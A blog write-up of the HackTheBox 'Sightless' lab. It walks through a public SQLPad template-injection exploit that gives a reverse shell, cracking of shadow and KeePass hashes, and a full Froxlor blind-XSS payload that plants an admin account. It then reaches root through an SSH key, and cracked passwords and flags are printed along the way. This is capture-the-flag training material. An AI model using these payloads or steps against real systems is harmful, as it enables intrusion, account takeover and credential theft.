Post

HackTheBox Sightless

Writeup for HackTheBox Sightless

HackTheBox Sightless

Machine Synopsis

Key exploitation techniques:

  • SQLPad template injection (CVE-2022-0944)
  • Docker container breakout (implied by host file access)
  • Hash cracking (Linux /etc/shadow)
  • SSH for initial user access
  • Froxlor Blind XSS (CVE-2024-34070)
  • FTP credential compromise
  • KeePass database cracking
  • SSH key retrieval from KeePass
  • Root SSH access

Enumeration

An nmap scan identified standard services: FTP (21/tcp), SSH (22/tcp), and HTTP (80/tcp).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
❯ nmap -p- --min-rate 10000 10.10.11.32
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

❯ nmap -p 21,22,80 -sC -sV 10.10.11.32
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)

The hostname sightless.htb was added to /etc/hosts.

1
echo -e '10.10.11.32\tsightless.htb' | sudo tee -a /etc/hosts

Browsing the website revealed a SQLPad link under “Our Services” leading to sqlpad.sightless.htb. This subdomain was also added to /etc/hosts.

webpage

webpage_services

sqlpad_webpage

The SQLPad instance was identified as version 6.10.0.

sqlpad_version

Exploitation

SQLPad RCE (CVE-2022-0944)

Research indicated SQLPad 6.10.0 is vulnerable to CVE-2022-0944 (template injection). A public exploit from GitHub was used to gain a reverse shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# Clone the exploit repository
❯ git clone https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944
❯ cd sqlpad-rce-exploit-CVE-2022-0944

# Setup Netcat listener
❯ nc -nlvp 4444
listening on [any] 4444 ...

# Execute the exploit
❯ python3 exploit.py http://sqlpad.sightless.htb 10.10.16.9 4444
Response status code: 400
Response body: {"title":"connect ECONNREFUSED 127.0.0.1:3306"}
Exploit sent, but server responded with status code: 400. Check your listener.

# Reverse shell received
connect to [10.10.16.9] from (UNKNOWN) [10.10.11.32] 44000
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# whoami
root

The shell confirmed root access within a Docker container. Further enumeration revealed /etc/passwd and /etc/shadow, indicating node and michael as users.

1
2
3
4
5
6
7
8
9
10
11
root@c184118df0a6:/var/lib/sqlpad# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
node:x:1000:1000::/home/node:/bin/bash
michael:x:1001:1001::/home/michael:/bin/bash

root@c184118df0a6:/var/lib/sqlpad# cat /etc/shadow
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
...
node:!:19053:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::

The michael hash was extracted and cracked using hashcat with rockyou.txt.

1
2
3
4
5
6
7
8
9
10
11
12
cat michael.hash
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::

❯ hashcat -m 1800 michael.hash /usr/share/wordlists/rockyou.txt
...
$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:insaneclownposse
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
...
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
...

The password for michael was insaneclownposse. SSH access was gained to the host machine.

1
2
3
4
5
6
7
8
9
❯ ssh michael@10.10.11.32
The authenticity of host '10.10.11.32 (10.10.11.32)' can't be established.
...
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.32' (ED25519) to the list of known hosts.
michael@10.10.11.32's password: insaneclownposse
Last login: Tue Sep  3 11:52:02 2024 from 10.10.14.23
michael@sightless:~$ cat /home/michael/user.txt
9bebe8818ad42e2a3d53c994cc290329

Privilege Escalation

Internal Enumeration & Port Forwarding

On the host, ss -tunlp revealed several locally listening ports.

1
2
3
4
5
6
michael@sightless:~$ ss -tunlp
Netid                   State                    Recv-Q                   Send-Q                                     Local Address:Port                                        Peer Address:Port                   Process
udp                     UNCONN                   0                        0                                          127.0.0.53%lo:53                                               0.0.0.0:*
...
tcp                     LISTEN                   0                        511                                            127.0.0.1:8080                                             0.0.0.0:*
...

Investigation of Apache2 configuration files in /etc/apache2/sites-enabled/ revealed 000-default.conf was configured to serve froxlor on 127.0.0.1:8080 with ServerName admin.sightless.htb.

1
2
3
4
5
6
7
8
9
10
11
michael@sightless:~$ ls /etc/apache2/sites-enabled/
000-default.conf  002-sqlpad.conf  05_froxlor_dirfix_nofcgid.conf  10_froxlor_ipandport_192.168.1.118.80.conf  34_froxlor_normal_vhost_web1.sightless.htb.conf  40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf

michael@sightless:~$ cat /etc/apache2/sites-enabled/000-default.conf
<VirtualHost 127.0.0.1:8080>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/froxlor
	ServerName admin.sightless.htb
	ServerAlias admin.sightless.htb
	...
</VirtualHost>

Since michael lacked permissions to access /var/www/html/froxlor, an SSH local port forward was set up to access admin.sightless.htb:8080 from the attacking machine.

1
❯ ssh -N -f michael@10.10.11.32 -L 8080:localhost:8080

internal_webpage_port_8080

The subdomain admin.sightless.htb was added to /etc/hosts.

1
2
3
cat /etc/hosts
127.0.0.1	localhost admin.sightless.htb
...

internal_admin_login_page

Froxlor Blind XSS (CVE-2024-34070)

Research indicated Froxlor was vulnerable to Blind XSS (CVE-2024-34070). The exploit involved providing an invalid username during login, intercepting the request with Burp Suite, and injecting a crafted XSS payload into the loginname parameter. This payload, when executed by an administrator, adds a new admin user.

1
2
3
4
cat original_payload.txt

admin{{$emit.constructor`function+b(){var+metaTag%3ddocument.querySelector('meta[name%3d"csrf-token"]')%3bvar+csrfToken%3dmetaTag.getAttribute('content')%3bvar+xhr%3dnew+XMLHttpRequest()%3bvar+url%3d"https%3a//demo.froxlor.org/admin_admins.php"%3bvar+params%3d"new_loginname%3dabcd%26admin_password%3dAbcd%40%401234%26admin_password_suggestion%3dmgphdKecOu%26def_language%3den%26api_allowed%3d0%26api_allowed%3d1%26name%3dAbcd%26email%3dyldrmtest%40gmail.com%26custom_notes%3d%26custom_notes_show%3d0%26ipaddress%3d-1%26change_serversettings%3d0%26change_serversettings%3d1%26customers%3d0%26customers_ul%3d1%26customers_see_all%3d0%26customers_see_all%3d1%26domains%3d0%26domains_ul%3d1%26caneditphpsettings%3d0%26caneditphpsettings%3d1%26diskspace%3d0%26diskspace_ul%3d1%26traffic%3d0%26traffic_ul%3d1%26subdomains%3d0%26subdomains_ul%3d1%26emails%3d0%26emails_ul%3d1%26email_accounts%3d0%26email_accounts_ul%3d1%26email_forwarders%3d0%26email_forwarders_ul%3d1%26ftps%3d0%26ftps_ul%3d1%26mysqls%3d0%26mysqls_ul%3d1%26csrf_token%3d"%2bcsrfToken%2b"%26page%3dadmins%26action%3dadd%26send%3dsend"%3bxhr.open("POST",url,true)%3bxhr.setRequestHeader("Content-type","application/x-www-form-urlencoded")%3balert("Your+Froxlor+Application+has+been+completely+Hacked")%3bxhr.send(params)}%3ba%3db()`()}}

The payload was edited to target admin.sightless.htb:8080 and URL-encoded:

1
2
cat edited_payload.txt
admin%7B%7B$emit.constructor%60function%20b()%7Bvar%20metaTag=document.querySelector('meta%5Bname=%22csrf-token%22%5D');var%20csrfToken=metaTag.getAttribute('content');var%20xhr=new%20XMLHttpRequest();var%20url=%22http://admin.sightless.htb:8080/admin_admins.php%22;var%20params=%22new_loginname=abcd&admin_password=Abcd@@1234&admin_password_suggestion=mgphdKecOu&def_language=en&api_allowed=0&api_allowed=1&name=Abcd&email=yldrmtest@gmail.com&custom_notes=&custom_notes_show=0&ipaddress=-1&change_serversettings=0&change_serversettings=1&customers=0&customers_ul=1&customers_see_all=0&customers_see_all=1&domains=0&domains_ul=1&caneditphpsettings=0&caneditphpsettings=1&diskspace=0&diskspace_ul=1&traffic=0&traffic_ul=1&subdomains=0&subdomains_ul=1&emails=0&emails_ul=1&email_accounts=0&email_accounts_ul=1&email_forwarders=0&email_forwarders_ul=1&ftps=0&ftps_ul=1&mysqls=0&mysqls_ul=1&csrf_token=%22+csrfToken+%22&page=admins&action=add&send=send%22;xhr.open(%22POST%22,url,true);xhr.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);alert(%22Your%20Froxlor%20Application%20has%20been%20completely%20Hacked%22);xhr.send(params)%7D;a=b()%60()%7D%7D

After sending the payload via Burp Suite, a new admin user abcd:Abcd@@1234 was created, allowing login to the Froxlor admin panel.

internal_admin_login_page_exploit

froxlor_dashboard

Within the Froxlor admin panel, under the “Traffic” tab, traffic from user web1 was observed. The “FTP” tab revealed the web1 user, whose password could then be changed.

froxlor_traffic_dashboard

froxlor_ftp_accounts_dashboard

froxlor_ftp_account_web1

FTP Access & KeePass Database

Attempting to log into the FTP service as web1 initially failed due to SSL requirements.

1
2
3
4
5
❯ ftp web1@sightless.htb
Connected to sightless.htb.
220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
550 SSL/TLS required on the control channel
ftp: Login failed

lftp was used to bypass the SSL error by disabling certificate verification.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ lftp web1@sightless.htb
Password: WaSjfvbnck
lftp web1@sightless.htb:~> ls
`ls' at 0 [FEAT negotiation...]
ls: Fatal error: Certificate verification: The certificate is NOT trusted. The certificate issuer is unknown.  (A1:4B:95:93:0A:CF:15:CD:DD:52:68:ED:DB:5B:92:ED:F0:F3:3C:69)

lftp web1@sightless.htb:~> set ssl:verify-certificate no
lftp web1@sightless.htb:~> ls
drwxr-xr-x   3 web1     web1         4096 May 17  2024 goaccess
-rw-r--r--   1 web1     web1         8376 Mar 29  2024 index.html
lftp web1@sightless.htb:/> cd goaccess/backup
lftp web1@sightless.htb:/goaccess/backup> ls
-rw-r--r--   1 web1     web1         5292 Aug  6  2024 Database.kdb
lftp web1@sightless.htb:/goaccess/backup> get Database.kdb
5292 bytes transferred

A Database.kdb file was found and downloaded.

The Database.kdb file was password-protected. keepass2john converted it to a john compatible hash, which was then cracked using john with rockyou.txt.

1
2
3
4
5
6
❯ keepass2john Database.kdb > db.kdb.hash
❯ john db.kdb.hash --wordlist=/usr/share/wordlists/rockyou.txt
...
bulldogs         (Database.kdb)
...
Session completed.

The master password for the KeePass database was bulldogs. The kpcli tool was used to access the database.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ kpcli --kdb Database.kdb
Provide the master password: bulldogs

KeePass CLI (kpcli) v3.8.1 is ready for operation.
kpcli:/> cd General/sightless.htb/Backup/
kpcli:/General/sightless.htb/Backup> ls
=== Entries ===
0. ssh
kpcli:/General/sightless.htb/Backup> show -f ssh

 Path: /General/sightless.htb/Backup/
Title: ssh
Uname: root
 Pass: q6gnLTB74L132TMdFCpK
  URL:
Notes:
Atchm: id_rsa (3428 bytes)

The database contained an entry named ssh with an attached file id_rsa. This private key was exported.

1
2
3
4
5
kpcli:/General/sightless.htb/Backup> attach ssh
Atchm: id_rsa (3428 bytes)
Choose: (a)dd/(e)xport/(d)elete/(c)ancel/(F)inish? e
Path to file: /home/shiro/Documents/HackTheBox/Sightless/id_rsa
Saved to: /home/shiro/Documents/HackTheBox/Sightless/id_rsa

Permissions for the private key were set, and an initial SSH login attempt as root failed due to a formatting error.

1
2
3
4
5
6
7
8
chmod 600 id_rsa
❯ ssh -i id_rsa root@sightless.htb
The authenticity of host 'sightless.htb (10.10.11.32)' can't be established.
...
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'sightless.htb' (ED25519) to the list of known hosts.
Load key "id_rsa": error in libcrypto
root@sightless.htb's password:

The key’s formatting was corrected using dos2unix and by adding a newline, a common fix for keys exported from Windows environments or with malformed endings.

1
2
3
4
5
6
❯ dos2unix id_rsa
dos2unix: converting file id_rsa to Unix format...
❯ echo "" >> id_rsa
❯ ssh -i id_rsa root@sightless.htb
root@sightless:~# cat /root/root.txt
a485e85b07fa30316760de19fd11b747
This post is licensed under CC BY 4.0 by the author.